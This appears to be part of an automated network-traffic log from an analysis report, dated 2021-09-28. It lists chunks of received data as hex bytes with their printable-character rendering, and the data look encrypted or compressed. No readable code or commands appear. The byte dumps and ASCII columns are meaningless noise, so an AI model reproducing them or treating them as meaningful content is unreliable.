                                              Data Ascii: ?*'l"R;HnY@x%\k(?.<VOuX1x+1];@GB>:a3 skK/rzz=sK'ly/3$V@*.w"@\IaGy~`%~Bv'<^$}%ii{:^\}<_<jM
                                              2021-09-28 11:02:14 UTC123INData Raw: 36 88 b0 e0 0c a3 91 bc 18 37 4b 29 a8 55 f8 52 1b 77 00 ff 18 14 5d 86 96 db a8 20 f3 80 1e ad 7e 2f 38 4b dc d9 58 b7 8d f6 7d f1 24 23 8c f3 fb 15 f3 78 8c fa 8a 05 d9 84 1e d4 0f cb db 37 42 b7 98 79 d9 a6 4c 24 e7 9e 76 0f 39 fe 40 90 f9 a3 d8 f7 16 bb 5b 42 c5 d0 2f 7c db a5 c8 43 8b 18 3b 0d 84 ac 60 db 7f 40 b4 7d ce 6a 44 5a 7c ca d7 ae e6 b9 04 4b fe 9e 85 b0 67 53 bf 84 80 27 25 99 0f 42 95 2a 07 e1 39 b6 20 c1 88 f8 22 ff c8 14 b0 64 e0 aa fc 0b 44 a8 50 5b 76 dd 39 58 f4 be 1b 74 88 ee 05 b2 ff bd d0 fe ec bf eb 50 ff fe eb 4a af 71 98 9f 7f 6e cf cd 0d e9 f3 06 5e 5f 1a 2f 7b 8d 4b 15 05 40 cc 2a f2 7c 29 81 23 96 2b 44 eb 27 9a 13 cd 63 2c de ec cb 69 8d f5 da 20 e8 c1 f3 35 d5 29 a0 18 b1 5d 40 21 ce d7 16 e5 fc 05 05 fc 71 82 bb 9f 2d c8
                                              Data Ascii: 67K)URw] ~/8KX}$#x7ByL$v9@[B/|C;`@}jDZ|KgS'%B*9 "dDP[v9XtPJqn^_/{K@*|)#+D'c,i 5)]@!q-
                                              2021-09-28 11:02:14 UTC125INData Raw: d9 8a 8b 27 a2 2f b6 7f 1c f5 6f b9 e9 0a 95 1b 3b d5 d3 86 0d f0 b6 e0 e4 81 a0 42 ef d5 fd 4a 35 99 84 69 1b 89 b9 f7 2b 33 92 88 89 ee 74 0e 9a 7a a9 b4 7f c4 60 9b 59 91 4d 43 ea 7b 0d a0 b0 90 7e 9c 59 ae 04 c4 36 24 7c c4 60 4f 7e 26 8c 3c bc 49 1a 60 a4 3e dd c9 ca c7 d2 b7 6b c4 ef 6c e6 4f 5b 7a ac 2b ff 65 4c 33 f7 4c 0c 36 cf 3f 57 7e 2a e2 ec a6 29 e7 1e 16 d6 b2 61 18 c2 2d d7 f3 e2 1d bc d4 3e 7c 65 7b 75 a5 7d 7a f4 81 f7 00 85 1d 8b 32 8f c8 0e 30 2d 1b aa a7 20 a0 15 90 b0 c3 cc 08 46 95 76 7a e4 be 95 96 de 24 4a bd c7 46 8c d2 61 5e 0d ef eb 8b 84 8e b2 98 a7 b2 5b ad f5 8a bd 91 2f 22 fe dc 23 a5 97 99 fa 59 7d f2 3d 81 31 d8 a5 b9 93 2f 0e 77 01 7e 16 60 56 e8 f0 73 bf 23 e0 b9 a3 b2 29 5b 30 20 cf df 14 a1 d6 b6 7e 6f 5c 84 2e f7 49
                                              Data Ascii: '/o;BJ5i+3tz`YMC{~Y6$|`O~&<I`>klO[z+eL3L6?W~*)a->|e{u}z20- Fvz$JFa^[/"#Y}=1/w~`Vs#)[0 ~o\.I
                                              2021-09-28 11:02:14 UTC126INData Raw: 5b ab d5 24 ed 1d 5d 84 19 21 cb ae b0 0a a1 f1 0e 35 fe cc 01 98 20 d5 a2 da 1a 5b 8a 7a 55 60 d7 11 7a dc 93 13 aa 8e c2 41 cc 66 bc 91 e6 f3 9c 71 75 d2 f1 cd 55 8c 51 bc 9c 7f 6e f3 d1 25 c4 e1 06 58 75 6a 51 e2 8d 50 21 13 64 7d 0e df 72 08 9f 07 a7 7c 60 ea 27 8a 37 e8 75 04 f0 c2 a1 11 03 79 dd 24 f7 e5 7a 14 e9 23 90 04 36 6c 6c 37 da ff c7 cc d1 0d 0d ee 73 c1 c1 06 2a df b4 90 f3 75 d0 49 38 d5 8b 78 eb 50 2b a6 f2 8b ea 40 79 3b ff 46 d1 f9 c8 3e 32 f1 eb 1c 20 b8 91 b5 df e0 bf 36 f3 06 c5 b6 14 49 e5 fb 6e 7c b1 7f 8e 55 e1 44 d6 3e 6e e2 1e b3 50 d3 14 4f f5 93 bf d0 92 b4 b5 dd 59 e5 5c 92 9e b7 52 a6 8e 98 bd 83 b0 b2 09 46 61 34 ca a6 f2 1d e1 0a 18 06 c3 c7 d7 57 aa 6c 64 cd 4f 20 56 22 71 19 54 f0 09 8c 17 f1 6e 93 4b 52 79 1e 89 60 7c
                                              Data Ascii: [$]!5 [zU`zAfquUQn%XujQP!d}r|`'7uy$z#6ll7s*uI8xP+@y;F>2 6In|UD>nPOY\RFa4WldO V"qTnKRy`|
                                              2021-09-28 11:02:14 UTC127INData Raw: 64 52 28 c8 a6 52 4a 93 f3 0f 63 34 51 09 a5 00 95 e9 8c d5 2f 83 60 7d 1a e5 bc 95 34 50 ee b7 f5 b0 af 38 9e 85 ec 9a 28 64 96 76 7a f4 97 b8 85 c8 2e 58 56 b9 df 8d d2 6d 59 a0 74 e2 a2 88 a3 b4 c7 87 35 43 53 f4 ba bb bb 37 0c f4 f1 52 f5 06 9f da 5e 62 a6 27 97 78 d5 ab 85 c4 0f 9d 76 8d 46 0d 48 79 85 fc 74 95 43 b6 04 a1 b2 2b 6c 19 ba ea f8 30 9b c5 e3 56 e2 a1 85 02 ee 79 6b 9d 46 8a ca ab 66 c3 48 95 bf fd a4 a2 d6 c5 eb c4 62 c0 52 f9 4e 75 9a 1e 8a 29 0d 10 65 1c 8d cc d2 f0 ab 24 e1 6a d5 e3 1c b9 73 c0 0d 3d 12 c8 43 27 04 25 26 52 98 dc dd 9e 30 3f 6f 01 f7 17 64 0b 18 e3 83 bf 65 ee 31 9c 1e b0 af 62 f6 c4 10 34 a7 37 97 99 e2 d0 57 68 30 f4 66 e2 15 95 cd 02 91 9a f1 10 5b 48 29 a2 5e de c7 35 75 06 e0 bf 7d 23 1f 96 c8 a8 2e ad 0c 39 22
                                              Data Ascii: dR(RJc4Q/`}4P8(dvz.XVmYt5CS7R^b'xvFHytC+l0VykFfHbRNu)e$js=C'%&R0?ode1b47Wh0f[H)^5u}#.9"
                                              2021-09-28 11:02:14 UTC128INData Raw: 5f b0 8f d5 75 d0 49 24 d5 b4 de cb 7b 29 86 d7 90 c2 6d 64 21 d1 41 b9 87 57 15 b4 8b 6d 3a ba 99 9c 3a f9 ff 98 8c e4 29 d7 90 2c e0 c8 f9 6e 5a a4 13 f0 cc ff 48 fa 0c 44 78 3d b4 d8 8b 92 66 d5 a3 9d 52 92 ad 9d 6a 7e c8 48 9e d4 4b cb a7 8e bc e9 ac 2a 97 3b 56 6f 06 e1 86 c3 35 63 74 96 2f ee c1 f7 d2 80 06 1a ce 6b 0d 43 1b 7b 00 71 dd 07 8a 61 dd 4e ab 55 7a 54 0b a1 4b 54 bf a3 3c 3c 09 b7 87 78 2b 56 ed 18 27 71 99 7f 0d 9f d1 86 20 52 13 61 c5 e9 3e a6 66 b7 88 3b 43 cc 91 e5 a2 96 b5 cd b4 c2 c9 f1 5d 0f a0 a3 2c 0d ab fb ee 7c bf 3f 72 3e 9d 76 5b 0e 17 4d 7a 8e cc f0 62 67 d4 b7 67 28 d2 47 f6 72 cc 0f 40 81 6d 8f 76 54 20 b7 05 15 6f 43 2a 8a 46 78 a3 a6 21 88 29 9c fd 71 5c 6c b9 c5 2a 12 1b 33 d5 49 b2 36 ea bb db 63 86 b7 bc ce 3d f9 52
                                              Data Ascii: _uI${)md!AWm::),nZHDx=fRj~HK*;Vo5ct/kC{qaNUzTKT<<x+V'q Ra>f;C],|?r>v[Mzbgg(Gr@mvT oC*Fx!)q\l*3I6c=R
                                              2021-09-28 11:02:14 UTC130INData Raw: c8 47 9f 42 ac 47 c1 18 5a d3 b0 96 f0 d4 18 54 e8 e5 e2 5d a2 7a 66 4d 6a 93 28 8f 06 0f 16 49 b0 9d 2b 4a f1 af 00 56 3d 4f c6 ab 93 78 cd 7c 3d 1d cb 43 27 3b 15 06 7f 9a c3 cb 9c 73 43 f6 06 dd 91 05 ca 83 c6 aa 90 ea f1 69 bc 30 96 82 73 cf ff 91 19 a5 37 b1 fe 84 ae ce 72 18 dd 7b bb 89 9a 62 73 2e 84 a8 34 b4 e1 29 a2 41 4a ca 35 66 20 c6 3f 13 5d 86 b7 9a a4 31 f7 8c 34 22 6d 2b 29 77 d2 98 c1 b6 8c 50 4c 5e 3c 21 02 de 52 07 e2 5e ad f3 9b 01 ca a1 59 d9 1b df dc 92 40 b5 98 7e e0 22 23 bb
                                              Data Ascii: GBGZT]zfMj(I+JV=Ox|=C';sCi0s7r{bs.4)AJ5f ?]14"m+)wPL^<!R^Y@~"#
                                              2021-09-28 11:02:14 UTC130INData Raw: f0 89 ee 3e 93 e9 56 0c 72 80 ed f0 ac 8a f1 6a 66 d0 0f 28 c2 a3 de ca 8f 14 28 08 94 1c ce b4 e6 41 be a9 fc c7 44 41 54 44 f2 83 fe b7 10 e7 fe 94 f1 82 06 5b a4 7a 94 28 0d c0 1f 42 93 1b 8e b7 37 b7 20 cf af 39 34 fe c8 84 9f 97 e1 a9 f4 92 44 a8 5a 76 12 df 11 60 ec 96 3c a8 88 ee 05 34 81 24 90 e2 e8 9f 44 50 ff fe 71 6f 82 63 9d be d0 6e ec cc 2d 9b eb 06 5e 40 09 07 56 8e 50 23 26 c6 99 b2 f3 7c 2a a0 93 87 58 62 70 02 bd 0d e3 57 b4 f6 e8 cb 4f e1 70 dd 20 f7 c9 c8 1c c6 2d b0 31 91 32 dd 34 da fb fe 55 fc 0f 0d 72 7c 86 ae b9 0b 6e b0 8f d5 cf 71 6c 36 f3 8e 76 e6 79 29 a0 d8 14 bc f4 7a 3b fd 4c 09 87 51 3f a8 d0 d9 2a 9c bd 0e bb f9 ff b8 9e c9 04 c5 a1 24 4c ca f9 68 50 19 6b 69 cd e0 40 f2 92 46 78 3b 04 7b d8 1a 41 f5 14 bd d0 92 8d 14 f8
                                              Data Ascii: >Vrjf((ADATD[z(B7 94DZv`<4$DPqocn-^@VP#&|*XbpWOp -124Ur|nql6vy)z;LQ?*$LhPki@Fx;{A
                                              2021-09-28 11:02:14 UTC131INData Raw: 27 14 78 ee ce 31 e7 27 84 38 9c 8b 0c 6b 8f bf f8 e3 cf 1f f3 48 69 dc e4 4c 85 52 a5 7b 9f 0e c0 43 4e 34 e9 98 8b 64 54 15 55 51 e9 34 97 36 28 7d 3f 11 e6 96 42 b1 52 2c d7 d7 43 64 be fc 36 59 4d 5c 75 a6 06 bf 70 ff 64 03 81 64 5b e5 8f c2 0c af 75 c7 ba 81 0a 5f 15 90 a3 d3 78 03 ef 95 69 5e c6 92 97 87 ce 02 f4 42 5e 47 8c d6 49 90 f3 ee c7 15 a3 a8 b9 b2 87 6c 40 53 f4 86 47 9d 35 0c ed fa 10 a6 9d 9e dc 70 fb 8c 24 b3 55 df ad 4d 90 2f 08 ef a8 6b 04 46 74 50 fc 72 bf 09 3d 96 a0 b2 30 52 64 0d cd d5 38 97 5c c8 ef 79 a2 81 22 2d 51 46 9f dc a9 cd d3 3e 7a 91 95 bb e2 d2 2e ff e8 e5 fd 5c be 5f 64 4d 73 b0 86 dc 9d 0e 10 67 16 3a b2 4b f1 31 05 d3 2f 69 e6 e8 b6 55 df 7a 2a b9 cb 43 38 3a 00 23 7d 9a da f1 32 20 d8 f7 00 f3 33 a1 53 82 c6 34 95
                                              Data Ascii: 'x1'8kHiLR{CN4dTUQ46(}?BR,Cd6YM\updd[u_xi^B^GIl@SG5p$UM/kFtPr=0Rd8\y"-QF>z.\_dMsg:K1/iUz*C8:#}2 3S4
                                              2021-09-28 11:02:14 UTC132INData Raw: 8c 4d 0d 21 42 e7 2d d8 fe 50 19 22 87 5c 42 10 27 90 1f 5f 52 29 e7 ce eb 95 9a 78 dd 00 fd ce e0 31 d9 05 9b 19 13 4a 6e b3 a4 66 df e4 f8 2f f6 e8 59 ab 25 ba 06 cd 96 af 2e ef f5 64 16 ef 9a 5e cb 64 24 8e df 94 c2 6b 51 b9 87 f5 ba 87 55 1f ce f5 f4 3b 20 b8 91 aa df df 64 16 c1 04 e5 9f 02 61 c8 e7 46 57 99 15 f6 e6 66 3a 4b 20 46 7c 1b 63 5e f5 0b fd f0 8a af f6 b2 50 9d f0 5b c5 6b b6 f4 c9 d4 bc a6 b1 a0 aa 2c bd a6 36 de 2a e3 82 e5 e1 e1 0a 0f b4 cb e8 c6 77 a0 f8 1a 54 4e 00 1e 33 5b 83 66 f5 2a a8 08 dd 64 29 37 cb 78 09 a5 6d 81 39 dd a5 a7 2c 9e b6 da 0b a9 ed 82 02 7c c6 57 2d 1b cb ae 0d 70 7c 61 ef 6b 5f 27 4f 9a 8e 1b 45 e7 17 9b a1 b2 98 d8 b2 67 c9 f0 5d 95 a5 df 30 2b 8b 66 c6 51 bd 1f f3 12 1b 08 dd 05 3f 64 58 8f cb da e4 83 68 9b
                                              Data Ascii: M!B-P"\B'_R)x1Jnf/Y%.d^d$kQU; daFWf:K F|c^P[k,6*wTN3[f*d)7xm9,|W-p|ak_'OEg]0+fQ?dXh
                                              2021-09-28 11:02:14 UTC134INData Raw: a6 b3 c0 25 0c f2 c4 37 a3 b2 9c da 5c 57 70 c3 2b 54 db 89 ba b1 2e 08 75 17 63 3b 71 72 a7 dd 73 bf 29 e8 f8 b0 b2 2f 6d 64 0d cd d5 38 97 5c c8 ef 79 a2 81 22 d7 50 46 9f dc a9 cd d3 3e 7a 6b 94 bb e2 d2 55 e3 e8 e5 fd 77 be 5f 64 4d 73 b0 82 dc 9d 0e 10 67 16 c0 b3 4b f1 31 05 d3 2c 69 e6 12 b7 55 df 7a 6a a5 cb 43 3a 33 05 0c 7f 9c f6 5d ca c7 40 f6 04 d7 37 7a 53 82 5c 8b 9d 51 d7 49 98 ab b3 af 42 97 cf 38 19 ba 3e b9 9e 8e ae c8 43 b6 8e e0 ba 8f b4 c0 28 b6 85 a8 aa b1 66 3b 84 61 f5 ee 18 77 26 61 85 13 5d 99 9c e0 81 33 f7 90 36 89 11 b2 2e 5d 54 c6 7e b6 8c 54 f6 d0 11 33 24 64 51 2b f3 78 ad ca 8b 01 ca 9e 02 f9 36 dd c2 bc 47 31 e6 e1 cb a0 59 02 d6 88 ea 1e a5 cc 7b 1e ce 85 e7 e0 8a aa 7d f5 76 d0 2f 69 c3 8b f3 d1 a7 3f 00 8e ec af 49 ca
                                              Data Ascii: %7\Wp+T.uc;qrs)/md8\y"PF>zkUw_dMsgK1,iUzjC:3]@7zS\QIB8>C(f;aw&a]36.]T~T3$dQ+x6G1Y{}v/i?I
                                              2021-09-28 11:02:14 UTC135INData Raw: f1 5b e5 c0 9d d9 db ed 87 c9 9d a2 aa 0a 3e 36 48 47 34 c7 ae e8 1d e1 0c 25 a8 90 5c d6 51 84 26 52 55 4e 20 c8 18 76 91 57 fd 4f ab 08 db 6e 66 5b 52 79 16 ae 65 53 3b dd a3 17 8f cd 3e fd 2b 52 cd cb 03 5c 8b c3 08 36 c3 a0 00 3b 7d 67 c5 c9 fd ac 4e 9a 95 1f 6d cb 15 9b 3d bd 33 b7 0d 46 c9 f5 7d df 84 8e 3e b1 ae 53 fc 5a 9f 55 f4 38 9d 56 44 17 3f 60 67 9d e2 f7 e6 19 4b 9c e1 52 6b c0 f6 76 ec de 64 ac 7f 33 73 ff 32 91 25 7e ff 45 2a aa 4a 58 8b 8b 3c ac 07 9b 7d 0f c3 47 3f bf 93 94 1b 37 f5 9f 96 1b fb 07 de c9 94 91 9c a2 f8 ff 52 1e ae 90 7f e5 97 b0 dd 11 3a 92 89 bb 96 0b bb 99 51 af bf d1 c7 1b 08 c2 b4 64 7b ee 59 43 dc 23 91 5e c4 60 ae 04 db 01 3c 53 c6 48 49 54 a0 fa a5 bd 58 08 4b c1 24 dd ce 47 1c fe 89 4f fc aa 6d e1 59 85 fb 93 29
                                              Data Ascii: [>6HG4%\Q&RUN vWOnf[RyeS;>+R\6;}gNm=3F}>SZU8VD?`gKRkvd3s2%~E*JX<}G?7R:Qd{YC#^`<SHITXK$GOmY)
                                              2021-09-28 11:02:14 UTC136INData Raw: b6 69 77 17 25 ab b3 ab 42 87 de 38 19 3f 12 bc a1 aa 8e a0 68 30 f0 59 2a 9a b0 e0 12 bb ad 85 32 94 4d 03 24 3f 49 ee 18 73 26 89 94 13 5d 1c b2 e5 be 17 d7 f9 1d 0f 6f 0b b2 48 50 e6 47 97 a4 79 6e f5 3a 0b 84 3a ee 2b f3 7c ad 28 9a 01 ca 1b 2a fc 09 f9 e2 ca 6c b7 98 58 77 b5 5d 22 ee 84 c2 33 3d e9 50 26 6e db 59 e0 8a ae 7d 1b 67 d0 2f ec ef 8e cc f5 87 48 2b 08 92 16 82 df 7f 40 a1 a1 f4 47 46 41 52 f4 51 d0 75 90 30 4e de e6 f0 a2 67 c9 81 57 99 01 05 9f 1c 42 95 11 da dc ae b6 3f c1 a7 ba 36 fe ce 34 3c c4 69 8e d4 38 64 db 5b 56 62 4d 34 4d e6 98 31 d9 89 e8 2f 92 1f a8 91 e2 f3 b4 c3 7d fd fe ed 60 29 0f 22 9f 7f 6a cc b8 0c e9 e3 9c 7b 72 12 09 5b f8 51 25 0c 60 0c 3e f2 7c 31 b6 0b aa 5a 62 ec 0d 12 61 5c 76 04 f2 c8 be 6e 9a 78 47 05 c5 d1
                                              Data Ascii: iw%B8?h0Y*2M$?Is&]oHPGyn::+|(*lXw]"3=P&nY}g/H+@GFARQu0NgWB?64<i8d[VbM4M1/}`)"j{r[Q%`>|1Zba\vnxG
                                              2021-09-28 11:02:14 UTC137INData Raw: b6 67 0c 2d d6 f6 72 d7 bd 48 ae 7f af 7c 50 5e 2e 04 35 fa 65 bf 8b 59 4b 11 ae 0e 99 09 96 ea 0e c5 6d 99 25 1d 95 1b 2e fd fe 95 1b fd b7 79 9a 1f b6 bc ea d9 69 53 3e 99 19 5a c8 99 b3 d5 aa 39 92 8f b1 fb 62 22 98 4b 83 b2 9e c6 1d 22 de ef d0 68 c8 7d 2e 4a 22 91 7e 02 56 83 16 e2 05 83 7f c4 48 6f 91 31 84 3c a3 48 24 46 8d 25 db e4 5b 47 4a 9a 69 d8 c4 f4 e0 59 a5 e1 a5 04 fa 48 6c ac ee b2 0d 3a 32 03 55 55 d6 ed bf 1b 2a e7 1c 16 72 ce fb 64 52 28 f7 6e c9 6f be 66 0c 51 77 57 57 3f 01 95 f6 a1 f1 1a 81 60 64 3f a7 ef 0e 35 56 c0 2a d9 b3 8b 15 94 83 69 c9 08 ef 0f 53 57 ff 99 b5 1d c9 28 72 1c dc 5e 8c d2 71 6e de ec c7 89 ac 03 d5 0d a6 ba 44 73 6f a7 93 96 af 29 df c9 1e ab 04 9f da 5a 5d ef a5 b2 55 c4 91 b2 bd 2d 08 73 a7 c0 68 f9 55 87 f8
                                              Data Ascii: g-rH|P^.5eYKm%.yiS>Z9b"K"h}.J"~VHo1<H$F%[GJiYHl:2UU*rdR(nofQwWW?`d?5V*iSW(r^qnDso)Z]U-shU
                                              2021-09-28 11:02:14 UTC139INData Raw: ca 5f 2c a7 ad dc 77 6c 6c 56 de d1 84 6a ef a9 4b fe 90 d1 1e 66 53 a4 e0 ae 0a 37 cb 3d fe 94 31 0c e9 dd af 20 cb 90 8f 1c d3 ca 1e bc 90 72 f1 4d 3d 44 ac 7a eb 63 d7 11 fa d1 93 00 8c a8 55 2e b2 ff 9d 1a fb ec bf f6 78 d2 fc eb 4c 85 f3 c5 07 7e 6e e8 ec b3 e8 e3 06 c4 7a 2d 3e 5d ac ee 24 0c 40 c7 b9 eb 7c 2e 9c 0b aa 5a 62 ec 0d 16 61 5c 76 04 f2 c8 74 6e 9a 78 47 05 c5 d2 c6 11 7b 2c b6 1b 33 d4 5d 35 da e0 d7 cc d1 0d 0d ee 73 2d c1 06 2a df b4 af 15 ee f5 64 ac d6 b9 4c ed 5b e9 a7 f2 96 e2 cc 62 3b f9 73 97 af 7c 3d 32 f3 de b9 c4 04 bd bb fd df 59 17 c1 04 5f 93 21 70 ee d9 af 7b 9b 15 d0 01 f9 44 d2 3f 6e 55 39 9e 58 df 89 19 4c a6 bd d4 b2 6f 9c f0 5b 7f 7f 95 e5 ef eb 65 8f 9c a2 8a ff 8e 24 48 59 03 ce 84 c5 19 cb 8c 71 b7 ef c5 d3 71 43
                                              Data Ascii: _,wllVjKfS7=1 rM=DzcU.xL~nz->]$@|.Zba\vtnxG{,3]5s-*dL[b;s|=2Y_!p{D?nU9XLo[e$HYqqC
                                              2021-09-28 11:02:14 UTC140INData Raw: 28 e8 6e 6c 6b f4 b2 0d 07 e5 39 57 55 cf ca 11 48 b1 e6 1a 38 d4 53 63 65 52 b6 f2 da da 49 9e 1f 28 7c 65 51 11 bd 00 95 e9 94 d5 2f 83 60 7d 1a 09 bc 95 34 50 ee 88 43 2b 8a 15 0a 86 de da 2e cf 71 77 7a ee 9f ee 9c c8 28 6d 35 ef 6b 8e d2 6f 6c 75 90 5e 8e 86 81 8b 71 a6 ba 40 c9 d1 8b 81 b0 15 e9 f3 db 38 ab 1b 85 da 5a 62 f8 95 9f 57 db 8b b0 16 51 91 74 8d 42 36 86 55 87 fc e8 9a 04 da bb 80 54 2e 73 4c 00 41 ce 3e bd c5 bd 5e 55 a0 85 04 df d3 38 06 47 8c e4 e1 ff 5b 49 95 21 c7 df 29 d5 c8 02 e3 7d 96 52 ff 56 75 9a 1c 8a 29 0d 10 65 1c 61 cc d2 f0 ab 24 de d5 4e c6 31 2c 70 f2 4b 3b 95 23 42 27 1b 08 91 64 9a dc c6 9c 73 43 f6 06 dd 95 05 ca 83 c6 aa 90 aa f0 69 bc 30 96 82 70 cf ff d1 18 a5 37 b1 15 97 ae ce 76 3a d8 54 b9 8f b6 ca 8b c9 1c a9
                                              Data Ascii: (nlk9WUH8SceRI(|eQ/`}4PC+.qwz(m5kolu^q@8ZbWQtB6UT.sLA>^U8G[I!)}RVu)ea$N1,pK;#B'dsCi0p7v:T
                                              2021-09-28 11:02:14 UTC141INData Raw: c2 e0 31 e4 23 ab 1b 13 53 4f 1d f7 fd de e2 d6 89 73 71 58 ab bb bf 21 dd b0 8f 4f ca d8 76 10 d3 9e 5c cb 7b 09 bf ef 96 c2 72 77 13 d4 6e bb 81 7b b9 4c 6c f5 3b be bd b7 b9 f9 ff 02 33 ec 16 e3 96 07 63 c8 f9 4e 5f 86 15 f0 d3 ed 6c ff 23 46 7e 11 18 20 6c 0a 67 d1 87 b1 d2 92 ad 07 d5 76 f7 7c 98 f8 cb cb a7 ae ae bf aa 2a 88 2a 60 6a 29 e3 80 ef 99 9f 93 0e 2e ea e5 da 53 80 06 80 71 63 32 74 1d 56 81 71 dd 27 ea 15 db 4e b4 5b 7a 54 0b a1 4b 54 bf a3 3c 3c 09 b7 87 f2 29 56 ed 18 27 71 99 7f 0d 15 d3 86 20 52 2e 7a c5 e9 3e ad 66 b7 88 3b 43 cc 91 e5 a2 96 b5 cd b4 48 cb f1 5d 0f a0 a3 2c 0d ab 71 ec 7c bf 3f 90 25 9d 76 5b 12 17 4d 7a 8e cc f0 62 67 d4 b7 67 28 d2 d1 f4 72 cc 0f 40 81 6d 8f 76 c2 22 b7 05 15 85 58 2a 8a 46 5c a3 a6 21 88 29 9c f9
                                              Data Ascii: 1#SOsqX!Ov\{rwn{Ll;3cN_l#F~ lgv|**`j).Sqc2tVq'N[zTKT<<)V'q R.z>f;CH],q|?%v[Mzbgg(r@mv"X*F\!)
                                              2021-09-28 11:02:14 UTC143INData Raw: fe 72 bf b3 ed b0 b2 94 0f 43 4e 20 cf f5 8e 9d da b6 69 75 8a a8 00 f5 57 6c 19 38 15 e1 c1 1c 7a 78 97 bb e2 68 1d de fa c3 c2 4c 94 72 66 6d c8 ba 00 a2 1b 04 38 4e 34 e3 b4 61 73 d5 b9 ff 3d 4b e6 03 b4 55 df c0 38 98 da 65 07 29 2a 0e 7f ba 14 fb b4 5e 5c de 2d f5 13 7d 79 04 b8 37 b1 43 f5 49 8f a8 b3 af f8 cc f2 2a 3f 85 04 93 b3 8c 8e 01 49 30 f0 66 8a a7 9d e2 0d b1 af 2e 4e 0d 4a 29 a6 61 e4 ed 18 77 9c c3 b8 01 7b a6 a3 ca ac 31 d7 96 3d 0f 6f 34 25 75 7d e4 58 b1 a6 d2 12 6c 3d 21 06 64 42 28 f3 78 17 7d b6 13 ec a1 3a d3 1b df e2 b0 4c b7 98 67 e5 88 70 20 f1 8f c0 98 41 70 57 0c ec 85 f6 e3 8a aa c7 4f 4b c2 09 56 fc a1 de d3 87 00 0b 08 92 29 43 e2 52 42 be ab f6 ec 3a d8 55 de d3 8e db 93 30 4a 64 b1 dc b0 41 73 93 78 8b 27 05 a9 3c 42 95
                                              Data Ascii: rCN iuWl8zxhLrfm8N4as=KU8e)*^\-}y7CI*?I0f.NJ)aw{1=o4%u}Xl=!dB(x}:Lgp ApWOKV)CRB:U0JdAsx'<B
                                              2021-09-28 11:02:14 UTC144INData Raw: fe 9f 1b 54 4a 00 05 3f 5b 83 eb f8 2a b8 2e fb 19 a9 49 52 59 57 82 4d 7e 26 cd 8d 10 0b b3 a1 d6 ad 28 74 83 02 58 ab 01 2f 1b d1 1c 05 5f 6e 41 e5 b1 23 be 4e ba e4 18 45 e6 08 83 13 ba b7 c9 92 6d 4f 8f c4 94 85 8a 1e 72 89 7e ee e6 9a 32 e7 1e bd 2f 46 04 3f 40 fe ad ca da fb 16 65 9b 65 2c f4 eb 74 0c 55 94 65 a8 5f f3 54 d2 20 2d 20 18 ef 63 0a d0 5b 4b 8b ab b6 ab 2f b6 61 27 e8 6f b9 c7 20 13 65 aa d4 d3 93 3b a0 9f fb e4 1c 92 91 fc df df 09 3c 99 83 5f 78 ab 95 f5 23 20 ba a2 93 10 73 08 1a 2f 32 9e 9c c2 3b 54 5a 91 49 f3 ed 54 1f fb 03 cd 7c 98 73 8e b1 e7 25 14 64 ec 65 4d 7e 20 ae be c2 c1 0d 6b 8b 05 80 cc dd 39 49 be 44 cd c2 4c bc 5b a5 7b a0 90 cb 6e 4c 2a c7 9f 0f 1a cb 3e d3 2b 50 e1 97 32 08 b9 18 3c f4 2a 47 48 40 0a f7 a9 ca 6f be
                                              Data Ascii: TJ?[*.IRYWM~&(tX/_nA#NEmOr~2/F?@ee,tUe_T - c[K/a'o e;<_x# s/2;TZIT|s%deM~ k9IDL[{nL*>+P2<*GH@o
                                              2021-09-28 11:02:14 UTC145INData Raw: a8 27 bc 66 2b a2 47 fa 69 66 ee 07 e6 91 33 23 84 97 c8 36 14 da 84 3a 2f 11 29 2f 5d 70 43 7d b7 8c 4b 63 dd 11 23 02 42 5d ac 8d e1 8c 58 9f 21 b5 83 0f d1 81 fa ef a8 4b 97 e7 7a ca a0 7d 96 d4 89 ea 01 31 c1 7b 0e e8 a3 ea 67 f4 33 5c 6a 62 f0 af 74 ca a3 44 f6 8a 2b 0c 28 12 34 48 ca 5f 82 9b ad dc 75 58 69 79 dc d7 a8 c6 17 4e d3 ff 94 f5 82 e6 51 a4 7a 11 02 08 ff 3b 62 14 33 0c c9 8e 68 05 cb 8f 88 29 d6 e5 1c ba bc da 09 aa a5 45 a8 5e 76 e0 d5 11 60 6e 9b 3c b8 ae c8 ad b0 ff bd b1 19 c9 bf eb 4f f2 d6 c6 48 af 77 91 18 01 f7 ed cc 09 c9 60 04 5e 5f 9a 0a 56 9e 76 05 8f 42 e7 2b d2 74 08 80 23 98 4c 4a c7 25 90 19 ef f1 7a 6f e9 cb 6b ba fc df 20 e8 5a c5 1c d6 0b 96 9f 11 4c 44 15 c6 d9 de e4 e3 1b 25 c5 5b ab b9 b5 ad a1 29 8e d5 eb d5 e1 34
                                              Data Ascii: 'f+Gif3#6:/)/]pC}Kc#B]X!Kz}1{g3\jbtD+(4H_uXiyNQz;b3h)E^v`n<OHw`^_VvB+t#LJ%zok ZLD%[)4
                                              2021-09-28 11:02:14 UTC146INData Raw: 57 22 c7 6d bf eb 88 eb 82 32 d5 d7 b7 be f9 9d fb 7e a3 9a ad c8 d9 5a 50 3e 99 a3 59 c2 88 95 ec 14 15 90 8f 97 3a f3 5c 01 50 ab 9b bc 60 19 08 58 0b 6c 44 da 5f 2e 7b 21 91 7e b8 5a 89 04 c4 3a 05 56 e9 4a 4f 78 0c 02 42 25 59 0c 6f af 82 df ce dd a3 f6 b6 7b fa c4 cb e3 59 a5 5b ba 0e e8 6e 53 3d c7 9f 0f 1a cb 3e d7 2b 50 e1 97 32 08 4f 18 3c f4 2a 47 48 43 0a f7 5f ca 6f be dc 6a 5b 65 71 69 8e 2d 97 f6 87 d7 84 ff f9 7a 30 8b e2 a5 37 50 ea 32 82 07 98 33 b0 0a f1 c8 08 cf de 51 7a ee a0 a6 af e5 2a 72 3a ed c4 f2 4b 68 46 f7 ce 6d 8d 86 85 31 b1 8a ab 66 73 5e a4 93 96 15 72 d5 db 38 96 b7 b3 d8 5a 7b d8 3b cc cc da 8d 9e b0 84 0a 75 8d dc 33 4d 46 a1 dc d9 bd 29 c8 bd 25 95 2f 73 53 2c e7 f8 3c bd dc 9c f4 06 3b 84 02 f1 71 ea 9d 46 8c 7a e4 35
                                              Data Ascii: W"m2~ZP>Y:\P`XlD_.{!~Z:VJOxB%Yo{Y[nS=>+P2O<*GHC_oj[eqi-z07P23Qz*r:KhFm1fs^r8Z{;u3MF)%/sS,<;qFz5
